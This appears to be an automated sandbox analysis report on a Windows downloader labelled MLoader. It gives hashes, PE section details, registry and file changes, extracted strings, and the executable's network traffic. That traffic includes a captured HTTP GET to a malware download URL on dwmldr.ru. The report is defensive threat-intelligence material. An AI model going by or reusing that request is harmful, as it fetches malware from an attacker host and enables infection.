Analysis Date: 2013-10-27 18:18:44
MD5: b89be2b9e5ffcad4cec8504a152ae654
SHA1: fbd203960c18d475a0c3ac42a51515a2d0d1f757

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: 800c6c1a7f7980ccddb8a566e5ce9ac1 sha1: 4f32caeddac5bdced3791b17d09833ea149da6d2 size: 8704
Section .data — md5: b3d8cb3b4e9e23b38fb35a4539eb8111 sha1: 3901abea4a26e52a888cfb9cf7f0f5511ddfb450 size: 43008
Section .bss — md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .idata — md5: 1a9815247cb11f88867cc25abb696f5b sha1: 8617b5ea31222a91cc1751f26559119f81b6036b size: 1536
Section .CRT — md5: a1a915fff755bbf0aad8951dca9cbc17 sha1: d34dd8df6a3fd6fbaabf028ee964a8c7c6983fca size: 512
Section .tls — md5: 7286f8a585270b237f9f3c472baa210d sha1: 7e29b2d4ae9c31ffb4712c1f60c188340966ad34 size: 512
Section .rsrc — md5: f1d6917f43a50a4b4bd59f627060386e sha1: 030bc4a2bed8106d19c1c1f4dbce39f74bacdafb size: 103424
Timestamp: 2013-10-18 12:08:43
PEhash: eecac92c9415ea154befd4415ff7e7b655f5eb99
AV (avg): Could be a potentially harmful program MLoader

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: dwmldr.ru

Network Details:

DNS: dwmldr.ru
Type: A
146.255.192.10
HTTP GET: http://dwmldr.ru/get_download_xml_3?id=5021576&did=141323360&hsig=4583e6db3240e71b13f6651d1ce430cb70b6f63ab10acf833bddb412d43058de
User-Agent: tiny-dl/nix
Flows TCP: 192.168.1.1:1031 ➝ 146.255.192.10:80

Raw Pcap
0x00000000 (00000)   47455420 2f676574 5f646f77 6e6c6f61   GET /get_downloa
0x00000010 (00016)   645f786d 6c5f333f 69643d35 30323135   d_xml_3?id=50215
0x00000020 (00032)   37362664 69643d31 34313332 33333630   76&did=141323360
0x00000030 (00048)   26687369 673d3435 38336536 64623332   &hsig=4583e6db32
0x00000040 (00064)   34306537 31623133 66363635 31643163   40e71b13f6651d1c
0x00000050 (00080)   65343330 63623730 62366636 33616231   e430cb70b6f63ab1
0x00000060 (00096)   30616366 38333362 64646234 31326434   0acf833bddb412d4
0x00000070 (00112)   33303538 64652048 5454502f 312e310d   3058de HTTP/1.1.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a207469 6e792d64   er-Agent: tiny-d
0x000000a0 (00160)   6c2f6e69 780d0a48 6f73743a 2064776d   l/nix..Host: dwm
0x000000b0 (00176)   6c64722e 72750d0a 0d0a                ldr.ru....


Strings
<<<Obsolete>>
061117000000Z
&0jIFC
0Y|q$K
100208000000Z
111209000000Z
131018120843Z0
140206235959Z0[1
141323360
1|~R3R
200207235959Z0J1
2< dOh
360716235959Z0
6]xa O
;6 zY7Sc	y09
8J\?M'|P
aC+Sv}
aGxE2& w
</assembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
atexit
b8J&?M'
<bt)-8
b%()tbo
/(c) 2006 thawte, Inc. - For authorized use only1
c<@5ms"
calloc
cc@he\"
Certification Services Division1806
_cexit
CFDGCA@
CrncP#b
DeleteCriticalSection
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
]<~?E~G
EnterCriticalSection
ExitProcess
EytV4K
'f.PLh 
FreeLibrary
{f<Sy`
fwrite
f?-Zg/s5|}]8A
g2D2ap&
Gaz}%7
g@D!ep"
GetCommandLineA
GetLastError
__getmainargs
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetStartupInfoA
ggDliX&
gTDpi4&
HeapAlloc
HeapFree
.h)r.B
#http://crl.thawte.com/ThawtePCA.crl0
*http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
http://mail.ru/0
http://ocsp.thawte.com0
h.#Y?|
i0'`Ht
.idata
InitializeCriticalSection
IsBadReadPtr
@jo5ig
_Jv_RegisterClasses
JYF+PF
k:}`2'
`kcoB}
KERNEL32.dll
k/;'H\
k?H3u{*
LeaveCriticalSection
lg&@5m
l[HhIY7
libgcj_s.dll
LLC Mail.Ru0
LLC Mail.Ru1
LoadLibraryA
-*M.+9ma
malloc
memcpy
memmove
memset
mingwm10.dll
Mingw runtime failure:
__mingwthr_key_dtor
__mingwthr_remove_key_dtor
Moscow1
msvcrt.dll
NbmeH8
;n*;	Kq
OJ#D56
OLts{K
_onexit
ooL3q<.
O|Tt61
P`.data
__p__environ
__p__fmode
!,=p~S
P{soRm
R6R;h-h
$RANa#
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
<requestedPrivileges>
RK17QM
RnqiLT
</security>
<security>
__set_app_type
_setmode
SetUnhandledExceptionFilter
signal
s(P.}D6
s.P)}t2?
sQ\y,C
strcmp
SYpRMK
Thawte Code Signing CA - G2
Thawte Code Signing CA - G20
thawte, Inc.1(0&
Thawte, Inc.1$0"
thawte Primary Root CA0
!This program cannot be run in DOS mode.
TIGI)Wu
TlsGetValue
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
tsQtq,C
%tvbT_
  Unknown pseudo relocation bit size %d.
  Unknown pseudo relocation protocol version %d.
vB8?pY
VeriSignMPKI-2-100
vfprintf
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
  VirtualQuery failed for %d bytes at address %p
V?@)P%
W6t5YD6
Wc(%d>
_winmajor
:`	 Wv
x(Mh[r
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
xpU0z/T
\XxSTH
"\,yi:
Y|X-a.
$\Yyv>G{\XQ
Z^7D!=
Z&dw$?
Z)[s[2